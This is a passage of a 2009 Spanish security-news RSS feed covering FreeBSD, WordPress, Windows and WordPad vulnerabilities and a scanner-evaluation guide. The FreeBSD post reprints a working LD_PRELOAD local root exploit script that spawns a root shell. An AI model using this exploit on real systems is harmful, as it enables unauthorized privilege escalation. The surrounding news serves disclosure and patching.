<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a href="http://www.dragonjar.org/wapiti-escaner-vulnerabilidades-aplicaciones-web.xhtml" title="Wapiti &#8211; Escaner de Vulnerabilidades en Aplicaciones Web">Wapiti &#8211; Escaner de Vulnerabilidades en Aplicaciones Web</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a href="http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml" title="Parches para Windows que corrigen Vulnerabilidades Criticas">Parches para Windows que corrigen Vulnerabilidades Criticas</a></li><li><a href="http://www.dragonjar.org/criterios-para-la-evaluacion-de-los-escaners-de-seguridad-web.xhtml" title="Criterios para la Evaluación de los Escaners de Seguridad Web">Criterios para la Evaluación de los Escaners de Seguridad Web</a></li><li><a href="http://www.dragonjar.org/bug-quick-question-joomla.xhtml" title="Bug en el modulo Quick Question de Joomla">Bug en el modulo Quick Question de Joomla</a></li><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Fallo en FreeBSD permite obtener root</title>
		<link>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml</link>
		<comments>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml#comments</comments>
		<pubDate>Tue, 01 Dec 2009 08:54:39 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[BSD]]></category>
		<category><![CDATA[FreeBSD]]></category>
		<category><![CDATA[sistema]]></category>
		<category><![CDATA[variables]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3442</guid>
		<description><![CDATA[Acaba de hacerse publica una vulnerabilidad descubierta por Nikolaos Rangos en los sistemas FreeBSD que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este sistema operativo.

El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla [...]]]></description>
			<content:encoded><![CDATA[<p>Acaba de hacerse publica una vulnerabilidad descubierta por Nikolaos Rangos en los sistemas FreeBSD que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este sistema operativo.</p>
<p style="text-align: center;"><img class="alignnone" title="Bug en FreeBSD" src="http://imgur.com/HNx9D.jpg" alt="HNx9D Fallo en FreeBSD permite obtener root" width="200" height="223" /></p>
<p>El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla el rtld pueden ser engañado para que acepte variables LD, incluso en los binarios setugid.<span id="more-3442"></span><br />
VERSIONES DE FREEBSD AFECTADAS<br />
**********************************<br />
FreeBSD 8.0-RELEASE *** VULNERABLE<br />
FreeBSD 7.1-RELEASE *** VULNERABLE<br />
FreeBSD 6.3-RELEASE *** NO VULNERABLE<br />
FreeBSD 4.9-RELEASE *** NO VULNERABLE</p>
<p>Para más detalles ver el exploit.</p>
<p><code>#!/bin/sh<br />
echo ** FreeBSD local r00t zeroday<br />
echo by Kingcope<br />
echo November 2009<br />
cat &gt; env.c &lt;&lt; _EOF<br />
#include </code></p>
<p><code>main() {<br />
extern char **environ;<br />
environ = (char**)malloc(8096);</code></p>
<p><code>environ[0] = (char*)malloc(1024);<br />
environ[1] = (char*)malloc(1024);<br />
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");</code></p>
<p><code>execl("/sbin/ping", "ping", 0);<br />
}<br />
_EOF<br />
gcc env.c -o env<br />
cat &gt; program.c &lt;&lt; _EOF<br />
#include<br />
#include<br />
#include<br />
#include</code></p>
<p><code>void _init() {<br />
extern char **environ;<br />
environ=NULL;<br />
system("echo ALEX-ALEX;/bin/sh");<br />
}<br />
_EOF</code></p>
<p>Para compilar y ejecutar</p>
<p><code>gcc -o program.o -c program.c -fPIC<br />
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles<br />
cp w00t.so.1.0 /tmp/w00t.so.1.0<br />
./env</code></p>
<p>Mas Información en el <a rel="nofollow" target="_blank" href="http://seclists.org/fulldisclosure/2009/Nov/371">Full Disclosure publicado por Nikolaos Rangos</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml" title="Vídeo: Introducción al Metasploit Framework">Vídeo: Introducción al Metasploit Framework</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?">¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>XSS que permite postear a atacante registrado en WordPress</title>
		<link>http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml</link>
		<comments>http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml#comments</comments>
		<pubDate>Thu, 12 Nov 2009 07:56:06 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3341</guid>
		<description><![CDATA[Una nueva revisión de seguridad ha salido para la rama 2.8.x del popular WordPress, en esta ocasión se corrigen 2 fallos, el primero descubierto por el investigador en seguridad web  Benjamin Flesch, permite a un usuario registrado, por medio de un ataque XSS en la función “Publica esto” (Press this), publicar cualquier contenido en nuestra [...]]]></description>
			<content:encoded><![CDATA[<p>Una nueva revisión de seguridad ha salido para la rama 2.8.x del popular WordPress, en esta ocasión se corrigen 2 fallos, el primero descubierto por el investigador en seguridad web  Benjamin Flesch, permite a un usuario registrado, por medio de un ataque XSS en la función “Publica esto” (Press this), publicar cualquier contenido en nuestra pagina.</p>
<p style="text-align: center;"><img title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5" src="http://farm3.static.flickr.com/2614/4031483944_c613aa6089_o.jpg" alt="WordPress" /></p>
<p><span id="more-3341"></span>El segundo problema <a rel="nofollow" target="_blank" href="http://wordpress.org/development/2009/11/wordpress-2-8-6-security-release/">no es explicado claramente en el comunicado oficial de WordPress</a>, solo nos comentan que el error se  encuentra el sistema de archivos y que podría provocar vulnerabilidades en ciertas configuraciones de Apache y que lo ha Dawid Golunski.</p>
<p>Es recomendable que actualicen su versión de WordPress, ya sea por el panel de administración o <a rel="nofollow" target="_blank" href="http://wordpress.org/">descargando la ultima version desde su pagina oficia</a>,  para asegurarse de que tiene la mejor protección disponible.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/los-blogs-alojados-en-wordpresscom-vulnerables.xhtml" title="Los Blogs alojados en WordPress.com Vulnerables ">Los Blogs alojados en WordPress.com Vulnerables </a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml" title="Reseteo Remoto del Password de Admin en WordPress">Reseteo Remoto del Password de Admin en WordPress</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-265.xhtml" title="Actualiza a WordPress 2.6.5">Actualiza a WordPress 2.6.5</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-263.xhtml" title="Actualiza a WordPress 2.6.3">Actualiza a WordPress 2.6.3</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Parches para Windows que corrigen Vulnerabilidades Criticas</title>
		<link>http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml</link>
		<comments>http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml#comments</comments>
		<pubDate>Wed, 11 Nov 2009 00:29:20 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Noticias Software]]></category>
		<category><![CDATA[Criticas]]></category>
		<category><![CDATA[Ejecución]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Parche]]></category>
		<category><![CDATA[Remoto]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3332</guid>
		<description><![CDATA[Microsoft ha publicado hoy martes 10 de noviembre,  6 boletines de seguridad que contiene parches para resolver 15 fallos de seguridad en Microsoft Windows y Microsoft Office.

Los fallos son bastante graves permitiendo a un atacante la ejecución de código remoto o realizar un ataque de denegación de servicios en el pc que corra una de [...]]]></description>
			<content:encoded><![CDATA[<p>Microsoft ha publicado hoy martes 10 de noviembre,  6 boletines de seguridad que contiene parches para resolver 15 fallos de seguridad en Microsoft Windows y Microsoft Office.</p>
<p style="text-align: center;"><img class="alignnone" title="Fallos en Microsoft Windows" src="http://farm3.static.flickr.com/2713/4094141864_29bca9afa8_o.jpg" alt="4094141864 29bca9afa8 o Parches para Windows que corrigen Vulnerabilidades Criticas" width="320" height="214" /></p>
<p>Los fallos son bastante graves permitiendo a un atacante la ejecución de código remoto o realizar un ataque de denegación de servicios en el pc que corra una de las aplicaciones vulnerables, les dejo un listado con los fallos de seguridad y el software afectado para que puedan determinar si tienen software vulnerable e instalen los parches:<span id="more-3332"></span></p>
<ul>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-063.mspx">Boletin de Seguridad  MS09-063 &#8211; Critico<br />
Vulnerability in Web Services on Devices API Could Allow Remote Code Execution (973565)</a></li>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-064.mspx">Boletin de Seguridad MS09-064 &#8211; Critico</a><br />
<a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-064.mspx">Vulnerability in License Logging Server Could Allow Remote Code Execution (974783)</a></li>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-065.mspx">Boletin de Seguridad MS09-065 &#8211; Critico<br />
Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947)</a></li>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-066.mspx">Boletin de Seguridad MS09-066 &#8211; Importante<br />
Vulnerability in Active Directory Could Allow Denial of Service (973309)</a></li>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-067.mspx">Boletin de Seguridad MS09-067 &#8211; Importante<br />
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (972652)</a></li>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-068.mspx">Boletin de Seguridad MS09-068 &#8211; Importante<br />
Vulnerability in Microsoft Office Word Could Allow Remote Code Execution (976307)</a></li>
</ul>
<p>Es muy recomendable que actualices tu sistema operativo y tu suite ofimática para evitar la oleada de gusanos y malware que no demoran en explotar estos fallos para propagarse por toda la red.</p>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://update.microsoft.com/windowsupdate/v6/default.aspx?ln=es">Actualizar tu Windows desde la pagina de Microsoft Windows Update</a></h2>
<p><strong>Fuente:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/current.aspx">Microsoft Security Bulletin </a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml" title="Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;">Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml" title="Denegacion de Servicio desde el WordPad">Denegacion de Servicio desde el WordPad</a></li><li><a href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml" title="Detección de WebDAV, verificación de la vulnerabilidad y explotación">Detección de WebDAV, verificación de la vulnerabilidad y explotación</a></li><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/video-tutorial-de-nessus-y-baseline-security-analyzer.xhtml" title="Video Tutorial de Nessus y Baseline Security Analyzer">Video Tutorial de Nessus y Baseline Security Analyzer</a></li><li><a href="http://www.dragonjar.org/la-mejor-defensa-es-la-informacion.xhtml" title="La Mejor Defensa es la Información">La Mejor Defensa es la Información</a></li><li><a href="http://www.dragonjar.org/microsoft-publica-8-nuevas-actualizaciones-de-seguridad.xhtml" title="Microsoft publica 8 Nuevas Actualizaciones de seguridad">Microsoft publica 8 Nuevas Actualizaciones de seguridad</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Criterios para la Evaluación de los Escaners de Seguridad Web</title>
		<link>http://www.dragonjar.org/criterios-para-la-evaluacion-de-los-escaners-de-seguridad-web.xhtml</link>
		<comments>http://www.dragonjar.org/criterios-para-la-evaluacion-de-los-escaners-de-seguridad-web.xhtml#comments</comments>
		<pubDate>Sat, 07 Nov 2009 08:13:07 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[metodologías]]></category>
		<category><![CDATA[Scanner]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3314</guid>
		<description><![CDATA[La Web Application Security Consortium, grupo internacional de expertos en seguridad de aplicaciones web, ha publicado un documento titulado &#8220;Web Application Security Scanner Evaluation Criteria&#8221; en el que nos presentan los criterios que debe tener en cuenta un escaner de seguridad para aplicaciones web la hora de probar de forma efectiva las aplicaciones web y [...]]]></description>
			<content:encoded><![CDATA[<p>La Web Application Security Consortium, grupo internacional de expertos en seguridad de aplicaciones web, ha publicado un documento titulado &#8220;Web Application Security Scanner Evaluation Criteria&#8221; en el que nos presentan los criterios que debe tener en cuenta un escaner de seguridad para aplicaciones web la hora de probar de forma efectiva las aplicaciones web y de identificar las vulnerabilidades que en ellas se encuentran.</p>
<p style="text-align: center;"><img class="aligncenter" src="http://www.webappsec.org/images/logo.jpg" alt="Web Application Security Consortium" title="Criterios para la Evaluación de los Escaners de Seguridad Web" /></p>
<p>Este documento proporciona una lista completa de características que deben ser considerados cuando se realiza una evaluación de la seguridad en aplicaciones web y su objetivo es proporciona las herramientas y documentación para permitir que cualquiera persona pueda evaluar los escáneres de seguridad web y elegir el producto que mejor se adapte a sus necesidades.</p>
<p><span id="more-3314"></span></p>
<p>El documento <a rel="nofollow" target="_blank" href="http://projects.webappsec.org/Web-Application-Security-Scanner-Evaluation-Criteria">Web Application Security Scanner Evaluation Criteria</a> puede ser leído de forma online directamente desde la pagina de La Web Application Security Consortium o <a rel="nofollow" target="_blank" href="http://projects.webappsec.org/f/Web+Application+Security+Scanner+Evaluation+Criteria+-+Version+1.0.pdf">puede ser descargado en formato PDF</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/video-tutorial-fingerprint-escaneo-basico.xhtml" title="Video Tutorial Fingerprint y Escaneo Básico">Video Tutorial Fingerprint y Escaneo Básico</a></li><li><a href="http://www.dragonjar.org/queryscan-01-beta-scaneo-para-auditorias-de-seguridad-web.xhtml" title="QueryScan 0.1 Beta &#8211; Scaneo para auditorías de seguridad Web">QueryScan 0.1 Beta &#8211; Scaneo para auditorías de seguridad Web</a></li><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/aplicaciones-web-vulnerables.xhtml" title="Aplicaciones Web Vulnerables">Aplicaciones Web Vulnerables</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/criterios-para-la-evaluacion-de-los-escaners-de-seguridad-web.xhtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Denegacion de Servicio desde el WordPad</title>
		<link>http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml</link>
		<comments>http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml#comments</comments>
		<pubDate>Sat, 15 Aug 2009 05:37:09 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Memoria]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[WordPad]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2977</guid>
		<description><![CDATA[El investigador MurderKey de Hellcode Research ha descubierto un fallo en el  Microsoft Wordpad (en Windows XP SP3), que puede permitir a un atacante provocar la denegación de servicio debido a un error de agotamiento de memoria, que se origina cuando un usuario intenta ver un archivo RTF especialmente modificado.

Un atacante puede explotar la vulnerabilidad [...]]]></description>
			<content:encoded><![CDATA[<p>El investigador MurderKey de <a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.hellcode.net/" target="_blank">Hellcode Research</a> ha descubierto un fallo en el  Microsoft Wordpad (en Windows XP SP3), que puede permitir a un atacante provocar la denegación de servicio debido a un error de agotamiento de memoria, que se origina cuando un usuario intenta ver un archivo <a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://es.wikipedia.org/wiki/Microsoft_Word#Formato_RTF" target="_blank">RTF</a> especialmente modificado.</p>
<p style="text-align: center;"><img class="alignnone" src="http://farm4.static.flickr.com/3509/3821737597_60d8196ee7_o.jpg" alt="3821737597 60d8196ee7 o Denegacion de Servicio desde el WordPad" width="500" height="217" title="Denegacion de Servicio desde el WordPad" /></p>
<p>Un atacante puede explotar la vulnerabilidad mediante la creación de un archivo RTF que asigne grandes cantidades de la memoria y provocar una condición de denegación de servicio, <a rel="nofollow" target="_blank" href="http://www.hellcode.net/wordpad.txt">ya se ha hecho publico un exploit</a> que permite aprovechar esta vulnerabilidad por lo que es recomendable que no recibamos archivos en formato RTF</p>
<p><strong><span id="more-2977"></span>Solución:</strong><br />
Por el momento no hay parche disponible. Por ahora se recomienda no abrir archivos de este tipo (RTF) que sean sospechosos.</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.4shared.com/file/125946630/bc71b2c/wordpad.html">ellcode Research</a><br />
<a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.securityfocus.com/archive/1/505708/30/0/threaded" target="_blank">Security Focus</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml" title="Parches para Windows que corrigen Vulnerabilidades Criticas">Parches para Windows que corrigen Vulnerabilidades Criticas</a></li><li><a href="http://www.dragonjar.org/process-hacker-mata-procesos-en-windows.xhtml" title="Process Hacker, Mata Procesos en Windows">Process Hacker, Mata Procesos en Windows</a></li><li><a href="http://www.dragonjar.org/wude-3-0.xhtml" title="WUDE 3.0">WUDE 3.0</a></li><li><a href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml" title="Detección de WebDAV, verificación de la vulnerabilidad y explotación">Detección de WebDAV, verificación de la vulnerabilidad y explotación</a></li><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/video-tutorial-de-nessus-y-baseline-security-analyzer.xhtml" title="Video Tutorial de Nessus y Baseline Security Analyzer">Video Tutorial de Nessus y Baseline Security Analyzer</a></li><li><a href="http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml" title="Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;">Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>
